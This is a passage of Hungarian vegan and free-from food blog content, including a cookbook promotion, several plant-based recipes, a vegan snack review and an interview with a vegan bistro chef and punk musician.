kérdéseket, melyek valahogy így hangoznak. ,,És akkor mit eszel? ,,Mit eszel, ha nem eszel húst? ,,Mit eszel, ha nem eszel glutént? ,,Mit eszel, ha nem eszel laktózt? ,,Mit eszel, ha nem eszel tojást? ,,Mit eszel, ha nem eszel állati eredetű ételt? ,,Mi az, hogy nyers vegán étkezés? ,,Milyen süteményt eszel, ha nem eszel finomított kristálycukrot? ,,Hogyan tudod elkerülni ezeket az alapanyagokat? ,,Hogyan tudsz így jóllakni? Ebben a könyvben nem arra keresem a választ, hogy miért legyen valaki vegetáriánus vagy vegán, vagy miért kerüljük a glutént, a laktózt, a finomított kristálycukrot akkor is, ha nem vagyunk orvosilag diagnosztizáltételallergiások. Lehetőségeket, ötleteket mutatok meg nektek, melyek segítségével sokkal színesebben és változatosabban fogyaszthatjuk a természet adta táplálékokat, alapanyagokat a konyhánkban. Vegetáriánus és vegán ételek mindenkinek! A húsevők is szoktak desszerteket, kifőtt tésztákat, gabonákat fogyasztani és a reggeli sem feltétlenül tartalmaz húst. ;-) Nem volt célom kifejezetten gyerekeknek készült ételeket megmutatni, de az eddigi visszajelzések alapján a gyermekek is nagyon szeretik a könyvet. Az utazós élmények, a privát világjárós képek, egyfajta "mesekönyv" hangulatot is árasztanak, így a gyerekek izgatottan várják, hogy mi történik velünk utazásaink során. Számtalan kérdéssel bombázva eközben az anyukákat! :-) (Kedves anyukák, akik már boldog MIT ESZIK A VILÁG? könyv tulajdonosok, ők számoltak be nekem ezekről a nem várt reakciókról.) A KÖNYVRŐL SZÁMOKBAN... 170 db vegetáriánus, 165 db gluténmentes, 160 db laktózmentes, 155 db tojásmentes, 140 db vegán, 45 db nyers vegán recept. 200 féle alapanyag 500 db színes fotó 4 kontinens 25 ország TOP10 listák 6 db interjú 80 db konyhai tipp A könyv első könyvbemutatója Dublinban volt, mivel jelenleg Írországban töltöm hétköznapjaimat. Azóta is nagy siker az írországi magyarok körében ez az izgalmas és információban gazdag, csodaszép könyv. Keménykötés, nagy méret, 284 oldal, színes fotók, könnyedén elkészíthető receptek és tálalási technikák, valós útikalandok. Gyertek! Együk körbe együtt a Világot! ;-) HASZNOS INFORMÁCIÓK A VÁSÁRLÁSHOZ A könyv ára: 5.995 Ft (+ postaköltség) vagy 20 euró (+postaköltség). A fizetés banki átutalással történik. Személyes átvételi lehetőség jelenleg az alábbi városokban elérhető: - Dublin, Írország - Luzern, Svájc - Ajka, Magyarország - Győr, Magyarország - Mosonmagyaróvár, Magyarország - Sopron, Magyarország - Budapest, Magyarország - A lista folyamatosan bővül. Könyvesboltokban a könyv nem lesz elérhető! Online értékesítés keretein belül kerül forgalomba, az írországi Avocado Foodship Limited kiadón keresztül. A Világ bármely pontjára eljuttajuk a könyvet postai és csomagküldő szolgáltatások segítségével. Tudom milyen nehéz magyar nyelvű könyvhöz jutni külföldi országban. Én magam is külföldön élő magyar vagyok hosszú évek óta, mialatt több országban is éltem és utaztam már. Ha szeretnél könyvet rendelni vagy kérdéseidre szeretnél választ kapni, szeretetettel állok a rendelkezésedre ezen az email címen: info@miteszikavilag.hu LAPOZZ BELE A KÖNYVBE! Katt ide! Még naaaaagyon hosszan tudnék írni a könyvről, annak keletkezéséről, megszületésének körülményeiről, mélypontokról, csodákról, támogatást nyújtó barátokról, családról és közösségről. Órákat vagy akár napokat képes lennék beszélni a MIT ESZIK A VILÁG?-ról, de most már nem húzom tovább a szót. Ennyi elég volt így első körben. Lapozzatok bele a könyvbe a megadott linken és ha bármi kérdésetek van írjatok nekünk az info@miteszikavilag.hu email címre. A könyvhöz tartozú www.miteszikavilag.hu weboldal már készül és hamarosan még több kérdés és válasz kap majd helyet az új honlapon. Addig is gyertek és nézzétek meg, hogy mit eszik a világ a Facebook oldalunk segítségével. Hamarosan újra útra kelünk, és még több izgalmas kalandról tudunk majd beszámolni nektek. Én már nagyon várom! :-) Megjegyzés: A közeljövőben várható könyvbemutatók helyszínei: Alkmaar (Hollandia), Zurich (Svájc), Sopron, Győr, Ajka, Budapest, Debrecen, London. Pontos dátumokról és helyszínekről bővebben információt a Mit eszik a Világ? Facebook oldalon kaphattok.
Csicseriborsós - cukkinis - sárgarépás FAL-NI (gluténmentes, laktózmentes, tojásmentes, vegán)
csicseriborsós - cukkinis - sárgarépás FAL-NI (mindenmentes, vegán) A FAL-NI, a FALafel és tócsNI szó házasságából született, általam kreált, nem létező szó. Nem tudtam eldönteni, hogy az elkészült étel inkább falafel vagy tócsni. Az alapanyagot tekintve az arab, csicseriborsós falafelre hasonlít, míg formára és ízvilágra inkább a magyar tócsnira, lepcsánkára, cicegére. Addig-addig gondolkoztam rajta, hogy melyik névvel illessem ezt a receptet, míg úgy döntöttem mindkettővel. :-) Az étel ötlete egyébként úgy jött, ahogyan nagyon sok másik étel a konyhámban. Megnéztem mi van itthon, milyen zöldségeknek lenne szüksége gyors felhasználásra, milyen alapanyagokat menthetek meg a kukába landolástól. Nem szeretek ételt kidobni! Ritkán is teszem! :-) Minden felhasználható valamiben, csak szabadjára kell engedni a fantáziánkat... mint például a FAL-NI esetében. ;-) karotin turmix Korábban már bemutattam nektek a mosolygós cukkinis tócsnit itt a Zöld Avocado vegetáriánus gasztroblogon, ennek szerettem volna elkészíteni egy sajtmentes, vegán változatát. A csicseriborsó konzervet pár hete vettem, hogy majd spenótos humuszt készítek belőle, de aztán ez a terv elmaradt. Sárgarépa mindig van itthon. Főleg, mert gyakran készül belőle csodafinom, energetizáló karotin turmix (sárgarépa+narancs+víz). :-) Ez a három alapanyag pedig megalapozta a csicseriborsós-cukkinis-sárgarépás FAL-NI hozzávalóit, amit aztán Balázs jóízűen be is falt, pillanatok alatt. ;-) csicseriborsós - cukkinis - sárgarépás FAL-NI (mindenmentes, vegán) HOZZÁVALÓK (2 személyre) - 2 db közepes méretű cukkini - 2 db közepes méretű sárgarépa - 1 db (bio) csicseriborsó konzerv - 1 nagy marék friss petrezselyem - 2-3 gerezd fokhagyma - 1 tk (frissen) őrölt római kömény (római, nem sima köménymag) - Himalája só, őrölt fehér bors, 1 ek mustár - kb. 6 ek csicseriborsóliszt - 1 ek útifűmaghéj - 1 ek lenmag - (elhagyható - 2 ek fekete vagy fehér szezámmag) csicseriborsós - cukkinis - sárgarépás FAL-NI (mindenmentes, vegán) ELKÉSZÍTÉS A cukkinit és a sárgarépát meghámozzuk, megmossuk, majd 1-1 db-ot lereszelünk a nagy lyukú reszelőn. A másik sárgarépát és cukkinit, a csicseriborsóval az aprítógépben / turmixgépben pépessé dolgoztatjuk a fokhagymával. (Csicseriborsót lé nélkül használjuk fel!) A friss petrezselymet apróra vágjuk, egy nagy tálban hozzáadjuk a cukkini-sárgarépa-csicseriborsó-fokhagyma pépet, a reszelt sárgarépát és cukkinit, a fűszereket tetszés szerint, az útifűmaghéjat és a csicseriborsólisztet. (Én tettem hozzá fekete és fehér szezámmagot, de ez kihagyható lépés.) Az egészet alaposan összekeverjük majd állni hagyjuk egy 15 percet, hogy az útifűmgahéj elvégezhesse a dolgát és megszívja magát folyadékkal. Egy teflon palacsintasütőben, kevés kókuszolajon, közepes lángon kisütjük a tetszés szerinti méretű FAL-NI "pogácsákat". Mindig legyen alatta kókuszolaj, mert abban tud szépen megpirulni, anélkül leég. Fordítsuk meg és mindkét oldalán süssük meg őket. Tálalhatjuk növényi tejföllel vagy fokhagymás szójajoghurttal, de önmagában is nagyon finom. csicseriborsós - cukkinis - sárgarépás FAL-NI (mindenmentes, vegán) Táplálkozz, ne csak étkezz a hétköznapokban is! :-) Megjegyzés1: Az elején vékony, tenyérnyi méretű "plecsniket" kanalaztam a serpenyőbe, de hamar rájöttem, hogy úgy szétesnek, amikor megfordítom őket. Majd kipróbáltam, hogy vastagabbra formázom őket és így már könnyedén megtudtam fordítani, anélkül, hogy széttörtek volna a FAL-NI-k. ;-) Megjegyzés2: Sokkal illatosabb és finomabb a római kömény, ha frissen daráljuk meg a felhasználni kívánt mennyiséget. Érdemes otthon tartani egy egyszerű kávédarálót, melyben a fűszereket frissen megőrölhetjük mielőtt az ételekbe tesszük őket. csicseriborsós - cukkinis - sárgarépás FAL-NI (mindenmentes, vegán)
Egy vegán Kínában (4.0)
Hogyan éljünk túl vegánként egy másik országban? Egyszerűen! Magyarországon és azon túl is könnyen és még könnyebben élhetsz tiszta vegán életet. A szupermarketek polcain már megtalálhatók a vegán helyettesítők is. De mi van azzal, aki keletre indul meg? Sőt, távol- keletre? Az hogyan éljen növényi alapokon? Ott, ahol még a betűk világában is nehéz eligazodni?! Virág bebizonyította, hogy igenis lehetséges egy teljesen más kultúrában, méghozzá Kínában is folytatni életmódját. A kezdeti nehézségek
Mogyorós-körtés pite (vegán)
Egy dolog biztos nagyon jó Magyarországban. A rengeteg gyümölcs és zöldség, ami nyáron terem. Most van idénye a nyári körtéknek is. Tavaly ilyen körtéből főztem lekvárt. A körte mogyoróval jó kis párosítás. Ősszel és télen gyakran vettem körtét (akkor már nem nyári körtét, hanem pl. Alexander vagy Vilmos), szívesen fogyasztottam reggelire natúr mogyorókrémmel. Míg a banán nutellával, a körte mogyorókrémmel, mogyoróval jól harmonizál. Megér egy próbát ez a körtés pite, főleg, ha sok körte terem a kertben. A recept Hozzávalók: - 20 dkg zabpehely - 30 dkg körte (nyári körtét használtam) - kb. 2 ek édesítőszer nyírfacukor, gyümölcscukor, ki mit használ (édesszájuaknak több kell bele) - sótlan pirított mogyoró - 2 ek folyékony kókuszzsír - víz/növényi tej - sütőpapír Elkészítés: A körtéket felkoczkázzuk, a zabpehellyel átkeverjük, öntünk rá egy kevés vizet vagy növényi tejet, adunk hozzá kókuszzsírt is, majd a végén édesítjük. Jó alaposan átkeverjük, sűrűbb masszát kell kapjunk. Egy tortaformát kibélelünk sütőpapírral, belesimítjuk a nyers tésztát, megszórjuk durvára őrölt mogyoróval majd egyenletes hőfokon kb. 20-30 perc alatt készre sütjük. Magában is nagyon finom, de a szeleteket akár egy kevés sziruppal (pl. Agave) is meglocsolhatjuk.
Snack Garden gyümölcsös és zöldséges vegán rágcsák
A Snack Garden gyümölcsös és zöldséges rágcsáit kóstoltam nem olyan régen, melynek eredményét a frissen indult Teszt szakasz rovatban dobom a közösbe. A Teszt szakasz rovat kifejezetten vegán termékek fényezésével és lehúzásával foglalkozik majd. A termékek kapnak majd hideget meleget annak fényében, ahogy éppen szubjektív szemüvegem áll a fejemen. Első tesztalanyom a Snack Garden márkának két rágcsája, a trópusi gyümölcs mix, valamint a zöldségkeverék. Snack Garden – liofilizált trópusi gyümölcs mix Felnyitás után olyan elemi erővel ütött meg a gyümölcsök illata, hogy azt hittem a piacos pultnál állok és a frissen szedett eprek fölött görnyedek 20 cm-re. Az első pofon után jött a másik, amikor megkóstoltam. Ugyanis a liofilizálás ellenére olyan természetes és intenzív gyümölcsízt éreztem ,melyet sokszor a friss gyümölcsöknél sem lehet manapság. Mindezt úgy, hogy nincs semmilyen hozzáadott ízfokozó, cukor vagy kemikáliás vicceskedés. Ergó, tisztán a gyümölcsöt éreztem. Ez arra enged következtetni, hogy a gyártósorra piszok szigorú feltételek után kerülhet csak fel gyümölcs. Vagy valami eszméletlen jó trükköt alkalmaznak. Ha így van akkor kérjük a receptet! Mindemellett a gyümölcsök ropogóssága egyszerűen semmihez sem hasonlítható. Frissen nem ilyen, sülve nem ilyen. Egész romantikus érzés fogott el minden egyes falat után. Nem tudok mit hozzáfűzni. Zseniális a cucc. De tényleg. Összetevők: banán (40%), eper (34%), ananász (26%), nitrogén csomagológáz Kiszerelés: 32g (300g friss gyümölcsből) Milyen mentes? Mindenmentes! Snack Garden – vákuumban sütött, enyhén sózott zöldségkeverék A gyümölcsmix után komoly elvárásokkal bontottam fel a sózott zöldségkeveréket, melynek illata nem volt olyan átütő, mint a gyümölcsöké. Sőt egy kicsit talán “sütödés” érzésem lett tőle. Az összetevőket és a készítést megnézve jöttem rá, hogy ez a különbség annak köszönhető, hogy míg a gyümölcsök liofilizáláson esnek át, addig a zöldségeket vákuumban sütik rizsolajban. Mindemellett hasonlóan dominált a zöldségek természetes íze és könnyen lehet, hogy ezt ettem volna először akkor nem érzek ekkora különbséget. A gyümölcsös túl magasra tette a lécet. Mindazonáltal bármikor szívesebben fogom enni bármilyen chips helyett, mivel egyértelműen egészségesebb és mindenmentessége számomra meggyőző. Összetevők: vegyes zöldségek változó összetételben (burgonya, édesburgonya, sárgarépa, tök, zöldbab) 75,2%, rizsolaj, só, nitrogén csomagológáz Kiszerelés: 40g (280g friss zöldségből) Milyen mentes? Mindenmentes! A Snack Garden kiemelkedően igényes csomagolása egyébként visszazárható, mely “fícsőr” első blikkre tök hasznosnak tűnik. Habár nem hinném, hogy sokáig megmarad egy ilyen mennyiségű nasi, ha felbontja valaki, de ha tényleg csak falatozol belőle akkor érdemes visszazárni, hogy ne szívja meg magát nedvességgel a tartalma és ne szottyosodjon meg. Feleségemmel nem csak magában ropogtattuk a gyümölcsöket, hanem rögtön a zabreggelihez is öntöttünk belőle. Úgy is nagyon fincsi volt. Ha a zabkásához megy, akkor pedig bizonyosan sok más édeskés étel kiegészítője is lehet. Áruk egyébként az átlag magyar pénztárcához mérten kicsit magas. A Herbaház webshopjában jelen pillanatban a gyümölcsös 760 forint, míg a zöldséges tasak ára 430 Ft. Egyelőre szinte piaci monopolistaként az ár elfogadható, meglátjuk, hogy milyen ártaktikával lépnek majd piacra a további szereplők. Kapcsolódó linkek: Snack Garden a weben Snack Garden a facebookon
Marinált portobello gombás zöldséges tál
2016. június 10. Zizi kalandjai
Portobello gomba. Rengeteg helyen olvastam róla és számtalan receptben fordult elő, amiket már ki szerettem volna próbálni. De soha nem találtam sehol portobello gombát, így fehér vagy barna csiperkével helyettesítettem. Egyik érdekes felhasználási módja, hogy egészben grillezve hamburgerbe teszik, de persze isteni gomba “pogácsa” (fasírt) is sülhet ilyen gombából (anyukámék ezt a változatot tesztelték és nagyon ízlett nekik). Én szeletekre vágva bepácoltam és úgynevezett portobello “bacont” sütöttem belőle, amit aztán egy szimpla zöldséges, quinoás tállal (Buddha bowl = Buddha tál) tálaltam. A Buddha tál lényege valamilyen gabona jó sok, színes zöldséggel tálalva. Nálam párolt spenót, brokkoli és koktélparadicsom került még bele és egy tahinis citromos szósszal öntöttem le, amibe csempésztem még egy kis miso pasztát, de ez el is hagyható. Íz- és színkavalkád egyetlen tányérban. (Hol kapható a portobello? Nemrég hallottam, hogy a Metroban, de az tudtommal nem Magyarországon termesztett. Ezeket a gyönyörű példányokat a BioFungi Kft-től kaptam. Ők rendelésre – ha rendel az üzletvezető – szállítanak portobellot Spar üzletekbe, csak kevés rá az érdeklődés, mert az üzletvezetők úgy gondolják, hogy ezt a kevésbé ismert gomba fajtát nem vennék az emberek és rajtuk maradna, megromlana. Szóval, ha ilyet szeretnétek, járjatok a nyakára a közeletekben lévő Spar üzlet vezetőjének! ) Gyerek kézben óriási példányok Gombavizsgáló Marinált portobello gombás zöldséges tál Hozzávalók 3-4 főre: Gombához: – 4 db nagy portobello gomba, szárai eltávolítva, gombafej megtisztítva – 1/4 bögre tamari (gluténmentes) szójaszósz (sima szójaszósz is használható) – 1/4 bögre víz – 1/4 bögre napraforgó olaj – 1 evőkanál almaecet – 1 evőkanál nádcukor – 2 teáskanál füstölt paprika – 1 teáskanál fokhagyma por – olívaolaj, sütéshez Quinoa tálhoz: – 1 bögre quinoa – 1/2 citrom leve – 600 g spenót, megtisztítva, felaprítva – 3 gerezd fokhagyma, felaprítva – 1 evőkanál olívaolaj, spenót pároláshoz – 300 g brokkoli, rózsáira szedve – 6-8 szem koktélparadicsom, félbe vágva – só, bors, szerecsendió Öntethez: – 1 evőkanál tahini – 4 evőkanál víz – 1 teáskanál miso paszta (elhagyható) – 1 gerezd fokhagyma, felaprítva – 1 db kisebb citrom leve – csipet só Egy tálban keverjük össze a pác hozzávalóit: tamari, víz, napraforgó olaj, almaecet, nádcukor, füstölt paprika és fokhagyma por. A gombafejeket vágjuk kb. fél cm vastagságúra, tegyük egy lapos tálba és öntsük le a páccal. Hagyjuk állni kb. 20 percig. Hevítsünk fel egy serpenyőt magas hőfokon, majd egy kevés olívaolajon süssük ki a gomba szeleteket (mindkét oldalukon pirítva 2-3 percig). Közben főzzük meg a quinoát sós vízben (1 bögre quinoa 2 bögre vízben) és adjuk a főzővízhez 1/2 citromnak a levét. Ha elkészült, villával keverjük át és tegyük félre. Egy serpenyőben egy evőkanál olívaolajon dinszteljük meg a 3 gerezd fokhagymát, dobjuk rá a spenótot és pároljuk meg kb. 10 perc alatt. Sózzuk, borsozzuk és reszeljünk rá egy kevés szerecsendiót. A brokkolit vízgőz felett pároljuk meg vagy egy kevés olívaolajon néhány evőkanál vízzel serpenyőben főzzük meg kb. 8-l10 perc alatt. Egy kis tálkában keverjük össze az öntet hozzávalóit. Tálalás: tegyünk egy adag quinoát a tálba, szedjünk hozzá a párolt spenótból, brokkoliból, adjuk hozzá a félbe vágott paradicsomokat, a gombaszeleteket. Az egészet locsoljuk meg a tahinis citromos öntettel.
Interjú az Elixires Soós Ádámmal, a vegán ispánnal
Soós Ádám a vegán Elixir bisztró séfje, hardcore punk szkrímer és Bianchista meséli el melyik vegán étel lenne legszívesebben. Mesélj röviden magadról annak aki nem ismerne. Ádám vagyok, egy vidéki hardcore/punk srác. Amikor hat éve felköltöztem Pestre, már vegán voltam és nagy álmom volt, hogy vegán szakács, valamint bicajos futár legyek, noha enyhe túlzással élve nem tudtam főzni és ennek tetejébe a várost sem ismertem. Mindezek ellenére több helyen dolgoztam szakácsként majd konyhafőnökként és futárként is, és már saját kis vegán bisztróm van, az Elixir. Miért pont ispán és honnan jött a név? A vegan ispán vagy helytartó “gúnynév” először egy poénnak indult, mert hajlamos vagyok ,,túlságosan komolyan venni a veganságot és ehhez hasonló viccelődéssel próbáltuk feloldani azt, ahogy arra reagáltam, hogy elég sokan még egy vegánnak nevezett csoportban sem értik meg valamiért sajnos, hogy a vegánság az állatokról szól, nem pedig rólunk. Nem fér bele egy kicsi ez vagy az. Azt már szinte csak zárójelesen jegyzem meg, hogy az ispánság fogalmába nálam beletartozik az is, hogy maximálisan segítőkész vagyok és segítek, ahol tudok. Mi a véleményed a magyar vegán viszonyokról és tévhitekről a téma kapcsán? A honi viszonyokról nagyon vegyes érzelmeim vannak. Egyrészt az elmúlt években összesen egy vegan kollégám, felettesem volt az összes vegetáriánus, vegán helyet figyelembe véve. Ez is közrejátszott abban hogy megalapítottam az Elixírt, ahol valóban csak vegánok dolgoznak. De nagyon örülök, hogy egyre többeket érdekel a vegánság itthon, elindult valami hatalmas robbanás, ami köszönhető többek között Kristóf barátom személyének és könyvének is, viszont az kifejezetten zavar mind a mai napig, amikor anyagi megfontolásból ugranak fel a vonatra olyanok, akiknek húsos helyük is van például. Számomra a vegánság nem egy financiális luxusexpressz, amire fel lehet pattanni. Hanem a törődés, a szeretet egyik legszebb módja, a jogi, környezettudatos mozgalmak egyik legfontosabbika és a hitelességnek ebben alapvető értéknek kellene lennie. Ugyanis ez egy rémesen egyszerű dolog és teljesen érthetően van definiálva: nem használunk állatokat! Ha pedig nem használsz állatokat, nem élsz például a halálukból. Ezen logika alapján sem tudom elfogadni azt sem, amikor valaki vegán szakácsnak hívja magát bőrcipőben, mézzel és a többi. A forradalom a tányérodon kezdődik, de nem ott kell véget érnie. Legyünk mindannyian következetesek, próbáljuk meg minimalizálni az ártást és tegyünk meg mindannyian, akár közösen a lehető legtöbbet azért, hogy majd a következő nemzedékek is egy valamennyire használható sárgolyóbist vegyenek át. Valószínűleg bennem túlságosan intenzív egy vegán társadalom iránti vágy – ezért is tűnhetek szigotúnak – és valahol nagyon remélem, hogy pár évtized múlva már a múlté lesz az állathasználat. Ettől függetlenül én minden apró dolognak örülök, a vegetáriánusokat is simán támogatom, hátha egyszer vegánok lesznek ők is, hisz addig is kevesebb állat szenved. Kicsit mesélj az Elixirről. Mostanában költöztetted, de mik a távoli terveid a bisztróval? Nos, ez egy etikai – sajnos tartunk ott, hogy ezt a jelzőt hozzá kell tenni – vegán testvériség bisztrója, ami már full-time étterem lett. Próbálok rendkívül demokratikus módszerekkel irányítani, a barátság nagyon fontos alapja a cégnek és a kevés szabadidőnket is együtt töltjük Petivel és Lacival. Gasztronómiai szempontból a legsarkalatosabb pont, hogy az ételeink gluténmentes vegán ételek, amelyek nélkülöznek mindenféle mesterséges kóficot és frissen készülnek korán reggel. De például a hamburger zsömléjét leszámítva minden cukormentes is, olajat is csak a hamburger pogácsája lát és még az az olaj is kókuszból van. Próbáljuk minimalizálni a szemetet, minél környezettudatosabbak lenni, hóviharban is bicajon visszük ki az ebédet lebomló dobozban. Azért télen a bringán néha rezgett a léc rendesen, most pedig jön a következő nehézség, a betonforró 40-45 fok. De egy vegán előtt nem létezik lehetetlen. Az Elixir másik talppontja a közösségi konyha modellje. Sok étteremnél láttam azt kiírva, elmondva, hogy mennyire fontosak a vevők, csak ebből éppen érezni nem lehetett sokat. Mivel már untatott az ipari mennyiségű étkek gyártása napi 500+ adagos konyhafőnökként, arra vágytam, hogy több embert megismerhessek, és akár beszélgethessek velük egy ebéd mellett. Így fogtam magam, felmondtam és megalapítottam a saját helyem, ahol valóban fontos mindenki, ezért is vannak közösségi események, például önköltséges bográcsos parti – ahol legutóbb 150 ember számára készítettem vacsorát a Városligetben. Emellett főztem rászorulóknak, szokott lenni közös bicajozás és ott van az “Elixir menni random valakihez” program. Nagyon fontos számomra, hogy figyelem és törődés is társuljon ehhez az egészhez. Engem rendkívül motivál az Elixires közönség, akikékert ezt az egészet teszem. Ha nem így lenne, akkor már rég bezártam volna és elköltöztem volna az országból. Megszámlálhatatlanul sok kedves embert ismertem meg, több megrendelőnk azóta haverom, némelyik mondhatni barátom lett és sosem éreztem jobban a munkám, mint most az Auróra közösségi házban, ahova nemrégiben költözött a bisztró. De nem mulasztok el egyetlen alkalmat sem az állati jogokról, valamint az egészséges táplálkozás előnyeiről beszélni és valahogy a legtöbben fogékonyak ezekre. Szóval számomra az az abszolút cél, hogy egy nagyobb közösség alakuljon ki a vegánság alapelvein támaszkodva és minél több jó élményünk legyen együtt. Ez az Elixir. “Elixir menni random valakihez” – mesélj erről a projectről kicsit. Nem olyan régen jelentettem be az elsőt. A lényege az, hogy a projectnek dedikált facebookos eseménynál kell jelölni, hogy “jössz”. A csavar az egészben az, hogy nem jössz te sehova, hanem én megyek hozzád. Egy random generator program segítségével kisorsolok az attendelők közül egy nyertest, akihez elbicajozok, majd együtt sütünk-főzünk valamit abból, amit találunk a lakásban. Pár barátom azzal viccelődött, hogy már az első alkalommal egy szép lányhoz mentem és meg van bundázva az egész, de ez aljas rágalom. Az érdeklődők jelölnek, a program sorsol. “HALLOD, VIKTOR? ALJAS RÁGALOM.” Ha valaki bemenne az Elixirbe és azt kérdezné melyik általad kreált étel mutatja be legjobban szavak nélkül azt aki vagy, melyik ételt tennéd elé? Most feladtad a leckét. Talán egy intenzív, színes, valószínűleg thai zöldségragu lenne bőven megszórva zöldekkel, mogyoróval, csírával, barna rizzsel. Mivel naponta változik a menü és tizenfajta finomságot csinálok sokszor ad hoc jelleggel, így nehéz választani, de most, ebben a pillanatban ez jutott eszembe. Mióta növeszted a hajad és milyen hosszúság a cél? Erre a kérdésre nem számítottam, Gyuri. Itt nevetek a gép mögött. Igazából nem is növesztem, egyszerűen csak nem jutottam el egy ideje fodrászhoz. A nagy meleg miatt gondolkodom rajta, hogy sokkal rövidebb legyen, mert egyrészről utálok a konyhában sapkában dolgozni meg azt se szeretem, ha fel kell kötnöm a hajam. Szóval fogalmam sincs, mit fogok csinálni a fejemmel, viszont amikor legutóbb változtattam az arcberendezésemen – elhagytam a bajszom -, az némi túlzással közfelháborodást váltott ki, szóval meg kell gondolni minden lépésemet, nehogy elsodorjon a népharag. Vegán séf és zenész is vagy. Mesélj a zenekarodról. Hogy van időd még zenélni is? Most jött ki az új albumutok. Definiáld a stílusát. Néha magam sem tudom, hogy tudok ennyi mindenre időt szakítani, de úgy vagyok vele, ha valamit meg akarsz csinálni, azt nagy eséllyel meg is fogod. A zenekarom neve Libido Wins és atmoszférikus post-hardcore/screamo stílus lenne az a fura katyvasz, ha mindenképpen definiálnom kell. Nagyon depresszív, költői, néhol nagyon zajos, de hipermelodikus, tele van fura váltásokkal és sok helyen nyúlunk zongorához is. Van benne rengeteg punk, indie, emo, post-rock hatás is, de volt, ahol freejazz-t kevertünk bele. A már készülő, talán még idén megjelenő EP-n pedig lesz némi country és latin íz is itt-ott spoken word-del fűszerezve. Egyébként tizenéves barátság az alapja a bandának, voltunk turnézni többször más országokban is, kiadták a dolgainkat, játszottunk hajón, próbateremben, foglalt házban, nappaliban, gördeszkapályán, pincében, nagy klubban és kicsiben is. Volt pár év szünet most, majd hirtelen visszatértünk egy nagylemezzel, amely hatalmasat tarolt eddig. Stílusában globális szinten a Bandcamp oldalon top 3-ban volt, itthon is rengeteg pozitív visszajelzés érkezett. Nekem ez a fura kis banda életem szerelme a bicajozáson kívül. Alig várom, hogy ismét mehessünk turnézni, már nyárra és őszre le van kötve pár dátum, plusz 2017-re is szervezünk ezt-azt. Nehéz megoldani a próbákat, mert Laci, a gitárosunk - aki egyébként egy klasszikus vájtfülű, kissé elvesztegetett tehetség, bármilyen hangszerhez nyúl, ahhoz ért - három műszakban dolgozik vidéken, de örömünket leljük abban, hogy együtt lehetünk, akkor pedig pláne, ha mondjuk máshol szétzajonghatjuk az emberek lelkét. Bianchi. Mit jelent ez a szó neked? Precizitást, minőséget, sebességet, esztétikát, szabadságot. Kérlek, foglald össze 1 mondatban a veganizmus alapeszméjét. Az a jogi, filozófiai alapvetés és erkölcsi minimum, miszerint nem használunk (ki) állatokat önös érdekből, sem étkezés, sem szórakozás, sem öltözködés, sem kísérletek, sem bármilyen más célból. Köszönöm az interjút!
Padlizsános lecsó avagy kenőke olaszosan
Szeretem a hagyományos, magyar lecsót, amelyben csak hagyma, paprika és paradicsom van. Mivel a hűtőmben árválkodott egy szép duci padlizsán, így nem volt más választásom, ez is belekerült ebbe a lecsóba. :) Eheted rizzsel, főzelékkel vagy akár csak kenyérrel is, de ha összeturmixolod, kenőke lesz belőle. Hozzávalók: - 1 evőkanál kókuszolaj - 1 nagy vöröshagyma - 3-4 gerezd fokhagyma - 1/2 piros paprika - 1/2 zöld paprika - 4 közepes paradicsom (turmixolva) - kevés víz - himalája só, bors, chili, bazsalikom, rozmaring Elkészítése: A vékony szeletekre vágott hagymát az olaj-víz keverékében megpárolom/pirítom.Hozzáadom az ugyancsak kis szeletekre vágott paprikát, a padlizsánt, és belereszelem a fokhagymát is. Úgy 8-10 perc elteltével a paradicsompüré is belekerülhet.Fűszerezem, addig sütöm együtt, amíg a lecsó besűrűsödik. Ha kenőkének szeretnéd enni, akkor egyszerűen botmixerezd össze.
Gluténmentes zöldségfasírt - sütőben sütve
2016. május 30. Élj harmóniában
Gluténmentes zöldségfasírt sütőben sütveN em olyan régen közzé tettem egy rántásmentes sárgaborsó főzeléket (itt olvashatod) és ígértem, amit készítettem hozzá a zöldségfasírtom annak a receptjét is felrakom majd a blogra.Ennek is eljött az ideje:) A zöldségfasírt nagyon népszerű még azok körében is, akik amúgy nem nagyon kedvelik a zöldséges ételeket. Lévén nem érzékelhető a zöldség állaga és jó fűszerezéssel fantasztikus ízhatásokat lehet elérni. Nem nagyon szeretek kisült ételeket készíteni, mert sok a macera a ghíben, vagy más zsiradékban sütéssel - fröcsköl, ott kell mellette állni, egyfajta szaggal jár, etc. Ezért amit csak lehet, én inkább a sütőben készítek el, tisztább, szagmentesebb és nekem is egyszerűbb, időt takarítok meg:) Mindemellett kevesebb zsiradékot tartalmaz az így készített zöldségfasírt. Ez a fasírt nagyon egyszerű és finom - a fűszerezést kedvedre tudod váltogatni magyaros, indiai, olaszos, etc. kombinációkkal. A csicseriborsólsizt és a zabpehely keveréke teljes értékű fehérjéhez juttatja a szervezetedet. Én reggelire is szoktam készíteni valamilyen szósszal vagy valamilyen körettel, zöldségekkel kiváló ebédnek vagy vacsorának, jó kirándulásokra útravalónak is. Hozzávalók 2 szál sárgarépa 2 kisebb cukkini 1 2 nagy ek. Zabpehely (gluténmentes diétánál gluténmentes zabpehely ) 12 nagy ek. csicseriborsóliszt 10 ek. víz 2 ek. ghí (kókuszzsírt vagy bármilyen zsiradékot használhatsz helyette) egy csipet aszafoetida ( egy kis apróra vágott hagymával tudod helyettesíteni) só bors kurkuma petrezselyem Vegyszermentes (bio) alapanyagokat használj! A répát és a cukkinit mosd meg és reszeld le vagy aprító géppel vágd apróra. A zöldségekhez keverd hozzá a zab pelyhet és a csicseriborsólisztet, majd a ghít és a fűszereket is. Végül tedd hozzá a vizet és hagyd állni néhány percig. Vegyél a kezedbe kis adagokat és formázz belőlük fasírtot. Helyezd a fasírtokat egy sütőpapírral bélelt tepsire és 180-200 fokra előmelegített sütő ben süsd készre. (kb. 30 perc) .
Majonézes kukoricasaláta
